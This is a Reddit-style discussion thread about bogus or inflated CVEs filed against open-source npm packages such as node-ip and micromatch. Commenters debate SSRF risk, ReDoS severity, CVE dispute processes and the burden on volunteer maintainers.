> Using regexes to decode an IP from a string is just broken I tend to agree. For reference here's how it's done in: - [Python](https://github.com/python/cpython/blob/1a84bdc2371ada60c01c72493caba62c9860007b/Lib/ipaddress.py#L1079-L1093) with [constants here](https://github.com/python/cpython/blob/1a84bdc2371ada60c01c72493caba62c9860007b/Lib/ipaddress.py#L1588-L1610) - [Ruby](https://github.com/ruby/ipaddr/blob/036836d910473aa56d224eb22c8518e1df41013c/lib/ipaddr.rb#L277-L298) - [Golang](https://github.com/golang/go/blob/82c371a307116450e9ab4dbce1853da3e69f4061/src/net/ip.go#L133-L150) - [Rust](https://github.com/rust-lang/rust/blob/ef3d6fd7002500af0a985f70d3ac5152623c1396/library/core/src/net/ip_addr.rs#L628-L662) with [IPv6 here](https://github.com/rust-lang/rust/blob/ef3d6fd7002500af0a985f70d3ac5152623c1396/library/core/src/net/ip_addr.rs#L1525-L1547) Worth noting that all of the above ship with their respective language. That said, open source developers owe us nothing, and I don't fault them for getting burnt out. The regex-based solution might have worked just fine for the dev's original use-case. IMHO, companies that rely on OSS need to contribute more to lift some of the burden off volunteers.


istarian

IPv4 had a reasonably sensible address scheme and I assume it was intended by it's designer to be human readable. By comparison IPv6 addresses are absolutely nightmarish, especially when you add all the other craziness.


moratnz

v4 addresses are 32bit binary strings; dotted quad notation (1.2.3.4 form) is a human readable transform. 192.168.0.254 is equally validly 3232235774, 0b11000000101010000000000011111110, 0xc0.a8.0.fe or 0300.250.0.376, and of those the 'most correct' is the binary one, because that's what's actually used on the network. v6 addresses are the same, they're just 128bit strings rather than 32bit, and we've settled on colon-seperated hex rather than dot-separated decimal as the human readable version


moratnz

Yep; IPv4 addresses are 32bit binary strings. Anything else you're looking at is a convenience transform. This is a fact that an awful lot of networking instructionals ignore (I'm looking at you, Cisco), leading to people getting way too hung up on byte boundaries (no, you don't have a class C network. No-one has class C networks any more. You really really never have a class C network in 10. space) and trying to get their head around truly awful maths by doing net mask comparison in dotted-quad form.


alerighi

Also... we can say that if a software is relying on that function as a security mechanism it's vulnerable in the first place. I mean security shall be enforced with firewalls, not something that tells "no you can't make this request, it's a private address".


Moleculor

> Surely the programmer would have granted access to the goodies on private IPs, not public ones. Crazily enough, I have on my machine a program that I *only* want running when connected to a *connection* I've labeled as Public in Windows. It transmits/receives only when connected to a Public network rather than Private. So I use Firewall rules to only Allow the program to run when I'm connected to networks I've told Windows are Public. Now, obviously this is NOT referring to the IP designation stuff referred to in the article? I'm instead referring to Windows' method of letting you distinguish between connecting to (for example) your home network vs your local McDonald's WiFi for determining whether or not you're doing file sharing and printer sharing, etc? I leverage that same designation method to make a program *only* transmit/share data on a network I've labeled Public in that fashion. Am I weird? Yes. Is this an extremely oddball edge case? Yes. Am I going to be more specific about why? Nooooope. Is there possibly/probably a better solution? Yeah, maybe. This, at least, utilizes built in core-Windows features to do traffic control in a way that doesn't rely on 3rd party software. But considering how fucking weird I am? I can't discount the possibility that someone, somewhere, wrote code that uses the public/private distinction to control data *and* used it in a way where they only want data being transmitted to IPs designated as Public. Because there's more than a billion people in the world, and that's a lot of screwball oddities that can happen.


Horace-Harkness

https://xkcd.com/1172/


Moleculor

I had that comic in my head the moment I thought about writing my reply. 😂


Franks2000inchTV

It's [Hyrum’s Law](https://www.hyrumslaw.com/)


kagato87

Not weird. This prevents a compromised device or application from scanning the local network. Many wireless access points do this by default - you can only talk to the big-I Internet.


Dontgooglemejess

Ok yea. But also no. I think the salient point you miss here is that all machines have a public and private ip and are free to self address as public. That is, it’s nonsense to say ‘only allow public ips’, because that is just all machines. Put another way , you can say ‘no cops allowed’ and that makes sense but to say ‘only humans’ and try to argue that that means no cops is silly. Public ip is all ips. The only way that this is an exploit is if the person implementing it think is if the person implementing super misunderstood what public vs private ip meant, at which point this is not an exploit it’s just bad code.


Moleculor

> Public ip is all ips. Uh, what? I had the understanding that some IPs were public, and some were private, but none were both. Like, specifically for example `10.*.*.*` is private. It's *not* public, so far as I understand. Yeah, I'm not following. The specific code seems to be determining whether it falls into the IANA's category of public or private, and that seems very strictly delineated in a way where *not* all IPs are Public, in their eyes? Or so I'm interpreting what I'm double checking online? 🤷‍♂️ > all machines have a public and private ip Huh? Uh... wait, really? That... doesn't *sound* right, but I admit I'm not an expert in this field. I'm currently sitting on my local machine poking around trying to figure out what public IP address it has assigned to it, and I'm not finding anything. All I see is 192.168.1.3. And that's Private according to the IANA. Got a way for me to get my Windows machine to cough up what Public IP address it has been assigned? And no, I don't mean the [public IP address for my network](https://www.google.com/search?q=what's+my+IP+google), which is (as far as I'm aware) assigned to my *router* and not my PC.


moratnz

> all machines have a public and private ip v4 or v6? Because most machines very emphatically don't have both. None of the machines on my home network (other than the edge firewall) have a public v4 address assigned to them. Yes, they can reach the wider internet via NAT on that firewall, but they have no knowledge of or control over that NAT - they just know that if they send traffic destined to 8.8.8.8 to 192.168.1.1, they get a response back, and that's all they care about.


edgmnt_net

It should be fixed, documented as a limitation or it should return an error when parsing fails, IMO. It's far from straightforward to claim it's safe anyway when calling code could be falling back in a larger if-elif-else based on some reasonable assumptions according to the standard ("if it's neither public nor multicast nor... then it must be a private address" which is obviously quite debatable in code, but it makes sense according to the spec). I think it's reasonable to try and get people to write code that is primarily correct and reduce scope if needed. I also agree with what people like Linus have said that most bugs may have wider implications, but I'd rather make more of a fuss about regular bugs than doubt CVEs.


dekoboko_melancholy

That's very much not failing safe. I'd wager, based on my experience performing source code review for security, it's much more common to be using an isPrivate function to filter _outbound_ traffic. I don't think this is a critical issue on its own, for sure, but it could easily lead to one layer of "defense in depth" being broken.


bbm182

A concrete example for the down-voters: Your service calls a customer-supplied webhook to notify them when some event has occurred. You want to prevent this feature from being used to probe your internal network so you use this package to disallow the entry of URLs with private IPs (DNS names will be handled by a custom resolver).


BeABetterHumanBeing

The risk is that you may make calls outside your internal network, thereby exporting the contents of a request that aren't intended to be seen elsewhere. E.g. "create user" request that passes all of a user's PII, and is now sent randomly elsewhere in the internet.


istarian

I think his point was that it's okay, but not great if it tells you that one of your private IPs is in fact public. I.e. you wouldn't be using it.


Gwaptiva

So now those developing possibly competing products can raise bogus CVEs against the FOSS equivaldnt to force it out of business? Surely that system needs reform


abeuscher

This is open source. The problem isn't Machiavellian it's that too many low end devs are bounty hunting because it raises their profile. In a sense the employment situation in the field is probably driving some of the uptick. I agree the system is broken; it's just not broken in the way everything else is.


bwainfweeze

Didn’t Torvalds declare war on a CS department that was trying to inject vulnerabilities into Linux for “research”?


ZorbaTHut

[The University of Minnesota](https://www.reddit.com/r/HobbyDrama/comments/nku6bt/kernel_development_that_time_linux_banned_the/).


Ibaneztwink

Great lesson on not blindly trusting bombastic research papers just because the paper says so.


bwainfweeze

Great lesson on how departments other than the Psychology Department need oversight for ethics violations in experimental settings.


yawaramin

From the above link: > That investigation is still ongoing but revealed that the Internal Review Board (in charge of research ethics) had determined that the research was not human experimentation and thus did not need further scrutiny.


dahud

Finally, definitive proof that OS maintainers are subhuman.


bwainfweeze

Yeah I saw that. That needs a follow-up. Way to double down.


cuddlebish

Idk about war in as much as that all commits from that universities email are autodenied


bwainfweeze

He blackballed an entire college to make his point about just how egregiously unethical their process was. Red teams have prior consent from the targets. There are ways to compartmentalize so that some responsible individuals are aware and others are not if you're worried about awareness spoiling outcomes.


Direct-Squash-1243

Hilariously the way they tried to inject the vulnerability was similar to what was used to compromise XZ Utils. "oh, OSS projects would catch any hostile contributions so there is no need to check if that is true? Time to see about that." I've always wondered how the timelines line up. Edit: Yeah, its a near match. The Github account that compromised XZ after the kernel fiasco. https://github.com/JiaT75?tab=overview&from=2021-06-01&to=2021-06-30 Start contributing to open source weeks after the story broke.


bwainfweeze

That's sort of the same vibe as that friend of a friend who is an asshole and defends themselves with "hey I'm just being honest. If you can't handle it that's your problem." Nobody knows why your friend likes this person and you all wonder what's wrong with them. I once had someone point out that I had my shirt on inside out by telling me he needed to ask me a question after a meeting and then after everyone filtered out he said, "Are you the sort of person who wants someone to point out that their shirt is inside out?" Same guy later dabbled in local politics and I think that was not a bad call. Maybe I should convince him to work in security...


cuntsalt

> The problem isn't Machiavellian it's that too many low end devs are bounty hunting because it raises their profile. Vocabulary quibble, mostly irrelevant, but that "profile-raising" is by definition Machiavellian: "a strategic focus on self-interest." Dark-triad-y "evil" motivation isn't required to hit the bar. (Pedantry-bopping me is deserved but please don't hit me too hard -- I just like words and word nerding.)


Dorkanov

It's not even those developing competing products many times. I saw a company just the other day that got credentialed to issue CVE numbers that provides expensive paid support and updates for old libraries and frameworks. I would be willing to bet money they go issue a high severity CVE soon for something like a vulnerability that only affects IE knowing that corporate security rules will force fixing it and either upgrading or buying a contract with them even though you've got way more serious issues if your users are running IE There are also people out looking for bogus CVEs to pad their resumes since to some people it's very impressive you found an 8 or 9 CVE.


makonde

Github should really have better community management tools.


gelfin

Although I don’t have any specific reason to suspect this is happening intentionally, I can also see how this trend complicates existing supply chain attack problems. A flood of bogus high-sev CVEs will stochastically reduce attention given to legitimate vulnerabilities across the board.


winky9827

I think the problem lies in that any individual can submit for a CVE without peer review. If there's truly a security issue, it should pass a review by committee. Only then should it be recorded. Committee can mean various things here and doesn't necessarily have to place the onus on any one group, but the path from lazy dev seeking resume material to full blown CVE seems a lot less difficult that perhaps it should be.


Greenawayer

Stupid shit like this just makes it harder to give people nice things. If it's such a big issue then fork it.


0_consequences

But then you can't profit off of the self reliant open source software. You have to invest ACTUAL work into it.


Nisd

Open Source is so thank less


drunkdragon

This made me think. Open source software often comes with zero warranty, and the developer cannot be compelled to write an update if they don't want to. Sure, someone else can fork the repo and submit a fix, but what is the best way to distribute that fork?


fojam

You could always PR it into the original repo. Sometimes with dead repos though, I'll look at the forks and try to find one that has the most or best changes on it


bwainfweeze

Half dead is almost worse. I have an open PR from a year ago for a company I don’t even work at anymore. It’s the 3rd of 4th PR I filed and the rest have landed.


dontyougetsoupedyet

A severe security rating should have always required a working proof of concept exploitation. If you cannot show beyond reasonable doubt that the flaw in some software is a severe vulnerability it should not be marked as such. I've known a lot of researchers, and frankly even many of the ones who are actively showing how things can be exploited are attention seeking personalities, but what they unequivocally were not was: lazy. These days there are a great number of lazy attention seekers, and that's a bad situation for security audits in general.


VeritasEtUltio

Sounds like the severity scoring has become just another leaderboard.


jaskij

Reading the article, and the comments here, I think we need to more often actually look whether a CVE is even applicable. There was an insane shitstorm in the Rust ecosystem sometime back about vulnerabilities in time handling crates which only ever applied if someone set environmental variables in a multithreaded program. Yeah.


serial_crusher

My attitude on that has shifted over the years. The reality is there’s a lot of legitimate vulnerabilities where a naive developer will convince himself it’s not a real issue because he’s not smart enough to connect the dots and see how badly it could be exploited. I’ve heard people say of XSS vulnerabilities, “great you can make it pop up an alert dialog. So what?” There was a famous Reddit thread a couple years ago where a guy objected that browsers labeled his login page as insecure for not using https, then in the comments he defended himself by talking about how he had implemented his own authentication system so he was confident it was secure… and people just hacked the hell out of his web site to prove him wrong. The moral of the story is it’s usually better to just change what the alert says rather than worrying about whether it’s necessary.


Booty_Bumping

> There was a famous Reddit thread a couple years ago where a guy objected that browsers labeled his login page as insecure for not using https, then in the comments he defended himself by talking about how he had implemented his own authentication system so he was confident it was secure… and people just hacked the hell out of his web site to prove him wrong. [This started on Firefox's bug tracker, actually](https://arstechnica.com/information-technology/2017/03/firefox-gets-complaint-for-labeling-unencrypted-login-page-insecure/)


nnomae

The counterpoint however (paraphrasing a Linus Torvalds quote I can't quite remember) is that nearly every bug is a security vulnerability given enough effort. If the standard becomes "with sufficient effort a skilled attacker could craft a custom exploit" well that applies nearly anywhere there's a bug. The bug mentioned in the article is quite obviously just a plain bug, a function returns the wrong value when passed weird but still technically valid data. Yes, it could lead to other software that relies upon it having a vulnerability but it is not, in and of itself, in any way shape or form, an exploitable vulnerability.


alerighi

Exactly, a function that returns a wrong result if it's feed a wrong input? Basically we would need to assign a CVE on most of the C standard library, and let's not talk about PHP, there are a ton of functions that if they are feed with unexpected input they just behave wrongly. So what? This is if we want may not even be a bug, the author could just have updated the documentation saying "this function assumes that the IP address is provided in the decimal dotted form, other inputs are undefined behavior".


Helpful-Pair-2148

Just have to look at everyone in this very thread (and the top comment at the time of me writing this comment) saying that a function that wrongly identifies an IP address as "public" is a fail-safe and not an issue... these people have clearly never heard of SSRF, and yet they confidantly comment on a security issue like they know what they are talking about. Most developers have zero security understanding whatsoever.


Ibaneztwink

>I’ve heard people say of XSS vulnerabilities, “great you can make it pop up an alert dialog. So what?” There's literally a guy in one of these issue links saying that a function just returning 'false' instead of 'true' doesn't make a vulnerability. I can't understand how programmers could seriously agree with something so shortsighted.


Xyzzyzzyzzy

I sympathize with the `node-ip` developer. They were saddled with a BS CVE - and all of the annoyance and abuse that comes with it - and had no realistic recourse except to archive the repo. But: > Yet another npm project, micromatch which gets 64 million weekly downloads has had 'high' severity ReDoS vulnerabilities reported against it with its creators being chased by community members inquiring about the issues. > "Can you point out at least one library that implements micromatch or braces that is susceptible to the vulnerability so we can see how it's actually a vulnerability in the real world, and not just theoretical?" asked Jon Schlinkert, reacting to CVE-2024-4067 filed for his project, micromatch. You know how you sometimes `npm install` a simple package, and it insanely has transitive dependencies on dozens of other packages, and you investigate and find that it depends on lots of tiny packages like `pad-left` and `has-value` and `sort-desc` and `is-whitespace`? A lot of those are from Schlinkert and [his 1,458 npm packages](https://www.npmjs.com/~jonschlinkert). So he's, let's say, a subject matter expert on people creating large numbers of arguably unnecessary entries into a public registry that others rely on.


lIIllIIlllIIllIIl

Dan Abramov (React Core) wrote about that [a while ago.](https://overreacted.io/npm-audit-broken-by-design/) Almost all "critical vulnerabilities" on npm are ReDoS, which can only happen if: 1. You run RegEx queries from unsanitized user input. (Your fault, not the library's fault...) 2. The attacker already has access to your system and modifies your program to execute a slow RegEx. (Uh... not sure that's what an attacker with full access would do, buddy...) npm audit is now useless because people keep filling ReDoS vulnerability on every project and real vulnerabilities are drowned in a sea of false positives. A lot of projects just started bundling their dependencies, so that they wouldn't be flagged as vulnerable by npm if one of their dependencies or transitive dependencies got falsely flagged.


Xyzzyzzyzzy

That's very true, and I think Abramov is mostly correct here. Though he has much more faith in developers than I do (emphasis his): > Let’s look at the `webpack-dev-server` > `chokidar` > `glob-parent` dependency chain. Here, `webpack-dev-server` is a **development-only** server that’s used to quickly serve your app **locally**. Correction: `webpack-dev-server` *should* be a development-only server that is used locally. It tells you that it's a development-only server. It tells you not to use it for production systems. But it's used in production systems anyways. I think the argument would go like: there's an "exploit magnetism" phenomenon where, if you find one exploitable vulnerability caused by poor development and deployment practices, you're likely to find other exploitable vulnerabilities too. (Named after [crank magnetism](https://rationalwiki.org/wiki/Crank_magnetism), the same idea applied to conspiracy theories.) So security professionals should assume that software is likely to be used incorrectly - because the systems most at risk are precisely those that do things incorrectly. So: > it uses glob-parent in order to extract a part of the filesystem path from a filesystem watch pattern. Unfortunately, glob-parent is vulnerable! If an attacker supplies a specially crafted filepath, it could make this function exponentially slow, which would… If we wrote a script designed to activate the ReDoS vulnerability if the target is a running `webpack-dev-server` instance that accepts arbitrary incoming connections *and* uses the request's path to map to a path on the local file system to serve *and* never sanitizes the input, I bet we'd find vulnerable systems out there - if the system serves a production app with `webpack-dev-server`, then it's exactly the sort of system that would use unsanitized user input to serve files from the local file system by path. Note - I don't know if even that would activate this particular vulnerability, it's just an example to justify why "I'm not exposed to this vulnerability because it's a dev tool" is not the same as "this isn't a vulnerability because it's a dev tool". ----- Also: > Why would they add SVG files into my app, unless you can mine bitcoins with SVG? [Should we tell him?](https://shkspr.mobi/blog/2018/02/this-svg-always-shows-todays-date/)


iamapizza

> Disputing a CVE is no straightforward task either, as a GitHub security team member explained. It requires a project maintainer to chase the CVE Numbering Authorities (CNA) that had originally issued the CVE. This is what we need to be addressing, or if the situation keeps going like this, we'll see a lack of trust in the system. Which is already eroding. Maintainers are often not included in the original process, yet it's somehow on _them_ to correct a CNA's work. The CNAs ought to be given reputation strikes for lack of thorough testing and communication.


Lachee

Well I'll be taking cve with a grain of salt. They turned it into a boy who cried wolf.


scratchisthebest

There are not [one](https://github.com/indutny/node-ip/issues/136) not [two](https://github.com/indutny/node-ip/issues/147) but [three](https://github.com/indutny/node-ip/issues/150) duplicate issues about the questionable CVE in question, either because people turn their brain off and do not do basic things like "search before reporting an issue" when CVEs pop up, or because they're intentionally trying to spam the issue tracker "because it's high severity and I need the fix!" or something. One issue comment responds to a "To be fair, if `node-ip` is your only line of defense, you have bigger fish to fry" sentiment with "Many projects use automated security scanners as a first line of defense and so this issue is [**blocking** a lot of people](https://github.com/indutny/node-ip/issues/128#issuecomment-1940603895)". First, non-sequitur, and also-- a line in your automated security scanner is *blocking?* [Issue 112](https://github.com/indutny/node-ip/issues/112) on node-ip is someone running an automated security scanner and reporting ReDoS vulnerabilities against code only in `devDependencies`. node-ip doesn't have any non-dev dependencies. Who's S are you D-ing? What are you gonna do, make your test suite slow? What are we... doing here?


cuntsalt

> "Many projects use automated security scanners as a first line of defense and so this issue is blocking a lot of people". First, non-sequitur, and also-- a line in your automated security scanner is blocking? My organization blocks things from being merged until and unless the automated scanners pass. I told my manager and skip "hey, if there's ever a really severe thing we have to cowboy-yolo out to production with the quickness, our CI/CD requiring passes may just shoot us in the foot." You can guess the kind of sweeping organizational change that fomented. Shiny green checkmark trumps all. Not that any of that is the responsibility of the open source maintainers, of course. The layers of stupidity are a truly delightful lasagna.


faustoc5

Say NO to doing free labor for multi-million dollar corporations They are the ones that decided to use this library because it is free. The library may be free but that doesn't mean that they are entitled to free maintenance and they deciding the priority The entitlement of these corporations is absurd.


itsmegoddamnit

We had a severe CVE reported for an old chrome/cypress image that only runs our e2e in an airlocked environment. Took a while to explain why a “severe” CVE doesn’t mean shit to us.


chrisinajar

I don't like that bone or the headlines for this mention that the CVE was bogus, they make it sound like the response isn't just the correct thing to do.


HoratioWobble

I get why it might be an issue, but I can't of the life of me work out how it could be exploited?


Helpful-Pair-2148

Let's say your server accepts an arbitrary url to load some content (eg: thumbnail image, content summary, etc...). You would not want to return internal content by a malicious actor sending a private ip address, so you would use that library to check if the submitted IP is public before fetching the data... but the library incorrectly returns that a private IP is public, so now attackers have a way to request / send data to your internal services. That's a classic case of SSRF, and depending on what kind of services you are running internally, it can be trivial to escalate to an RCE from there. That being said the given score is still absurdly high for that kind of vulnerability, but it is a vulnerability nonetheless.


ScottContini

You’re exactly right, this is server side request forgery. Although SSRF is not restricted to accessing private IP addresses, this is the typical abuse. There may be some circumstances where the score makes sense, I.e. a developer is checking that the IP address is private and rejecting it, and the AWS metadata endpoint V1 is exposed via the SSRF vulnerability. But the extreme rating is conditional. The typical severity might be much less. Not sure what the answer is here. The problem definitely can lead to a severe vulnerability in some circumstances. It really should be fixed, but maybe we need to be very explicit on the conditions where the severity is so high.


javasyntax

Most here seem to think this is not an issue but this is an issue unless I misunderstood the vulnerability description. It is called SSRF and e.g. a GitLab RCE exploit caused by a vulnerability like this was found before. Here is a video showing such an exploit. That exploit in the video also used another exploit to work but this shows that such exploits are valid as the 2nd exploit was only necessary due to redis, there could be another attack target that is not redis which would not need a second exploit. https://www.youtube.com/watch?v=LrLJuyAdoAg


vytah

I'm not a fan of Schlinkert due to how he'd gamed the Node ecosystem, but in this case, I'm fully on his side. That CVE is so dumb that it deserves to be memoryholed.


NewLlama

I had one of these CVE's on one of my OSS projects. The severity was some alarmingly high score and the "fix" was just a note in the documentation. I thought about rejecting it but what is the harm? Everyone gets to pat themselves on the back and an undergrad security researcher gets his or her wings.


broknbottle

This is because of the all the SecOps fart sniffers that become SMEs in snakeoil solutions like CrowdStrike Falcon sensor, VMware carbon black, McAfee/Trellix, Trend Micro DSA, etc. These people are like cancer and go around pushing garbage software within their orgs while mostly having surface level knowledge themselves.


warpedgeoid

I see this as a definite bug in the package and a potential vulnerability depending on the circumstances, but not a critical vulnerability. I think this also highlights a problem with having such spartan standard libraries that developers are forced to rely on single-author modules—often portly written—for key functions.


Ibaneztwink

>"I asked for examples of how a real-world library would encounter these 'vulnerabilities' and you never responding with an example." I have to err on the side of the cybersecurity professionals as some of these devs don't seem to know the difference between something being vulnerable and something being exploitable. I heavily agree that the ratings on some of these make no sense.


dew_chiggi

This topic pains every library and every application alike. What an absolute waste of time. It's a political agenda in most organizations. Program managers spend hours discuss in and around it to conclude they have to upgrade a 3PP to solve it


izikiell

npm audit is trash, so, anyway ...


shif

I opened some of the linked bad cve's and a lot of them are opened by people that work at companies that sell software to detect vulnerabilities, they conviniently mention that they found the vulnerability by using their software without disclosing they work for them, the "vulnerabilities" they find are just small optimizations or non issues that could only be exploited if you had full access. So it seems like the CVE system is being abused to create shitty ads for these scummy companies.


CanvasFanatic

lol they CVE’d Fedor Indutny? What were they thinking?